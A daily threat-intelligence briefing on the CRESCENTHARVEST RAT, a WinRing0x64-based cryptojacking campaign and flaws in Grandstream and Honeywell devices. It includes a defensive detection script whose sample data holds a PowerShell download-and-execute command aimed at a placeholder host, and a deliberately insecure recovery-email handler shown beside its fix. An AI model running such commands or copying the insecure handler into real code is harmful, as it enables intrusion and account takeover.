Daily Threat Briefing
Diamond Trail

Cyware Daily Threat Intelligence, February 19, 2026


The CRESCENTHARVEST campaign weaponizes geopolitical tension by disguising data-stealing malware as urgent media files related to the ongoing protests in Iran. This operation demonstrates a calculated use of social engineering, turning a search for human rights information into a direct conduit for state-aligned espionage.

A new breed of cryptojacking is bypassing the browser to strike at the heart of the operating system by hiding within pirated software installers. By embedding itself so deeply in the system, the miner achieves significantly higher performance while remaining largely invisible to traditional security tools.

A wide-open digital door has been discovered in several Honeywell CCTV products, where a critical "no-authentication" flaw allows remote account hijacking. This 9.8-rated vulnerability exists because a sensitive API endpoint was left exposed, permitting anyone on the network to change a device’s recovery email address without a password.

Top Malware Reported in the Last 24 Hours

CrescentHarvest malware campaign drops RAT

Cybersecurity researchers have uncovered a campaign named CRESCENTHARVEST, which appears to target supporters of the ongoing protests in Iran. The operation uses a RAT to facilitate information theft and long-term espionage. The attackers exploit recent geopolitical events to lure victims into opening malicious files disguised as protest-related images or videos. These files are bundled with authentic media and a Farsi-language report, enhancing their credibility. The attack begins with a malicious RAR archive containing deceptive Windows shortcut files which, when executed, run PowerShell code to retrieve additional malware. That malware extracts sensitive data, including browser credentials and system information, while communicating with a C2 server.

New cryptojacking campaign spotted

A newly discovered cryptojacking campaign exploits pirated software installers to facilitate a multi-stage infection aimed at maximizing Monero mining. This operation employs a customized XMRig miner and a controller component that ensures persistent access to infected systems. Unlike previous browser-based schemes, this campaign utilizes system-level malware, disguising itself as legitimate office productivity software to lure unsuspecting users. Once activated, the malware installs a primary controller named Explorer.exe, which orchestrates various functions based on command-line inputs, allowing it to install or remove components as needed. Notably, the campaign leverages a vulnerable signed driver, WinRing0x64.sys, to gain kernel-level access, enhancing mining performance significantly. 
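The two campaigns above leave telemetry a defender can match on: a shortcut opened from the shell that spawns PowerShell with a download cue (CRESCENTHARVEST), a load of the vulnerable signed driver WinRing0x64.sys, and a controller named Explorer.exe running from outside the Windows directory (the cryptojacking campaign). The script below is an added example, not code from Cyware or from the researchers; the log format, field names, sample events and the "explorer.exe outside C:\Windows" heuristic are my own constructions, and only the driver file name and the controller name come from the briefing.

```python
"""Toy detection pass over constructed endpoint telemetry (added example).

Assumptions: a simplified Sysmon-like event list that I constructed; field
names ("type", "image", "parent", "cmdline", "signed") are mine. Only the
driver name WinRing0x64.sys and the controller name Explorer.exe come from
the briefing; the parent-process and path heuristics are mine.
"""
import re

# Constructed sample telemetry: each dict is one event on one host.
SAMPLE_EVENTS = [
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",   # shell launching an opened .lnk target
     "cmdline": "powershell.exe -w hidden -ep bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\""},
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Vendor\updater.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},   # benign admin script
    {"type": "driver", "image": r"C:\Users\Public\WinRing0x64.sys", "signed": True},
    {"type": "driver", "image": r"C:\Windows\System32\drivers\tcpip.sys", "signed": True},
    {"type": "process", "image": r"C:\ProgramData\Office\Explorer.exe",
     "parent": r"C:\Users\Public\setup.exe", "cmdline": "Explorer.exe install"},
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
]

# Command-line fragments that indicate PowerShell fetching further content.
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|\s-enc\b",
    re.IGNORECASE,
)
# Driver file names from the briefing; extend from a vulnerable-driver list in practice.
KNOWN_VULNERABLE_DRIVERS = {"winring0x64.sys"}
LEGIT_EXPLORER = r"c:\windows\explorer.exe"


def basename(path):
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (event_index, rule_name, image) for every event matching a rule."""
    alerts = []
    for idx, ev in enumerate(events):
        name = basename(ev["image"])
        if ev["type"] == "process":
            # Rule 1: shell-launched PowerShell that retrieves content from the network,
            # the chain a double-clicked shortcut produces.
            if (name == "powershell.exe"
                    and basename(ev.get("parent", "")) == "explorer.exe"
                    and DOWNLOAD_CUES.search(ev.get("cmdline", ""))):
                alerts.append((idx, "lnk_powershell_download", ev["image"]))
            # Rule 3: something calling itself explorer.exe that is not the real shell.
            elif name == "explorer.exe" and ev["image"].lower() != LEGIT_EXPLORER:
                alerts.append((idx, "explorer_masquerade", ev["image"]))
        elif ev["type"] == "driver":
            # Rule 2: load of a driver on the vulnerable-driver list, signed or not.
            if name in KNOWN_VULNERABLE_DRIVERS:
                alerts.append((idx, "vulnerable_driver_load", ev["image"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Against the constructed events the pass raises three alerts (the hidden PowerShell download, the WinRing0x64.sys load, and the Explorer.exe running from ProgramData) and stays silent on the benign inventory script, the tcpip.sys load and the genuine shell. Rule 1 keys on the parent process rather than on the .lnk file itself because most process telemetry records the shell as the parent when a shortcut is opened; pair it with file-creation events for .lnk files extracted from archives if your sensor provides them.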

Top Vulnerabilities Reported in the Last 24 Hours

Grandstream GXP1600 phones vulnerable to attacks

Cybersecurity researchers have identified a critical vulnerability in the Grandstream GXP1600 series of VoIP phones, tracked as CVE-2026-2329, which has a high CVSS score of 9.3. The flaw is an unauthenticated stack-based buffer overflow that allows remote code execution with root privileges. It is rooted in the device's web-based API service, which is accessible without authentication in default configurations. By exploiting this flaw, an attacker can send a malicious request that overflows a 64-byte buffer, corrupting memory and executing arbitrary code on the device. This could lead to serious consequences, such as intercepting VoIP calls by redirecting the device to a malicious SIP proxy. The flaw affects various models within the GXP1600 series, and a firmware update has been issued to address it.

Critical flaw in Honeywell CCTV products

A critical vulnerability, tracked as CVE-2026-1670, has been identified in multiple Honeywell CCTV products, allowing unauthorized access to camera feeds and potential account hijacking. Discovered by researcher Souvik Kanda, the flaw is classified as "missing authentication for critical function" and has a severity score of 9.8. It enables unauthenticated attackers to change the recovery email address associated with device accounts through an exposed API endpoint, facilitating account takeover. Affected models include several Honeywell CCTV cameras used in small to medium business environments and critical infrastructure settings. Although there has been no reported public exploitation of this vulnerability as of February 17, CISA has issued a warning to raise awareness.
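The Honeywell flaw is the textbook "missing authentication for critical function" case: a state-changing endpoint that trusts whatever account name the request body names. The snippet below is an added illustration written for this briefing, not Honeywell's code and not the real endpoint; the route name, request shape and bearer-token session scheme are my own constructions. It shows the exposed handler beside a hardened one that requires a session and binds the change to the session's own account.

```python
"""Missing-authentication pattern on a recovery-email endpoint (added example).

Assumptions: RECOVERY_PATH, the Request/Device shapes and the token scheme are
constructed for illustration and do not describe the Honeywell API.
"""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Device:
    accounts: dict = field(default_factory=dict)   # username -> recovery email
    sessions: dict = field(default_factory=dict)   # session token -> username

    def login(self, username):
        """Issue a session token after a (not shown) successful credential check."""
        token = secrets.token_hex(16)
        self.sessions[token] = username
        return token


@dataclass
class Request:
    path: str
    body: dict
    headers: dict = field(default_factory=dict)


RECOVERY_PATH = "/api/account/recovery-email"   # placeholder route, not the real one


def handle_vulnerable(dev, req):
    """Before: any caller who names an existing account can rewrite its recovery email."""
    if req.path != RECOVERY_PATH:
        return 404, "not found"
    user = req.body.get("user")
    if user not in dev.accounts:
        return 404, "no such account"
    dev.accounts[user] = req.body.get("email", "")   # no check of who is asking
    return 200, "updated"


def session_user(dev, token):
    """Resolve a bearer token to a username with constant-time comparison."""
    for stored, user in dev.sessions.items():
        if hmac.compare_digest(stored, token):
            return user
    return None


def handle_fixed(dev, req):
    """After: authenticate first, then only allow a change to the caller's own account."""
    if req.path != RECOVERY_PATH:
        return 404, "not found"
    auth = req.headers.get("Authorization", "")
    token = auth[len("Bearer "):].strip() if auth.startswith("Bearer ") else ""
    caller = session_user(dev, token)
    if caller is None:
        return 401, "authentication required"
    if req.body.get("user", caller) != caller:
        return 403, "forbidden"          # no cross-account changes via this route
    email = req.body.get("email", "")
    if "@" not in email:
        return 400, "invalid email"
    dev.accounts[caller] = email
    return 200, "updated"


def demo():
    """Drive both handlers with the same requests; returns the status codes seen."""
    anon = Request(RECOVERY_PATH, {"user": "admin", "email": "attacker@example.invalid"})

    dev = Device(accounts={"admin": "owner@example.com", "viewer": "v@example.com"})
    before = handle_vulnerable(dev, anon)[0]            # exposed endpoint accepts it

    dev = Device(accounts={"admin": "owner@example.com", "viewer": "v@example.com"})
    after_anon = handle_fixed(dev, anon)[0]             # rejected without a session
    viewer_token = dev.login("viewer")
    cross = handle_fixed(dev, Request(RECOVERY_PATH, {"user": "admin", "email": "x@example.com"},
                                      {"Authorization": f"Bearer {viewer_token}"}))[0]
    admin_token = dev.login("admin")
    own = handle_fixed(dev, Request(RECOVERY_PATH, {"email": "new-owner@example.com"},
                                    {"Authorization": f"Bearer {admin_token}"}))[0]
    return {"vulnerable_anon": before, "fixed_anon": after_anon,
            "fixed_cross_account": cross, "fixed_own_account": own,
            "admin_email_after": dev.accounts["admin"]}


if __name__ == "__main__":
    print(demo())
```

The hardened handler derives the target account from the session rather than from the body, which is what closes the takeover path: even an authenticated low-privilege user cannot redirect another account's recovery email. When auditing a device API, the question to ask of every recovery, password-reset or role-change route is exactly this: where does the handler learn who it is acting for, and is that value attacker-supplied?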
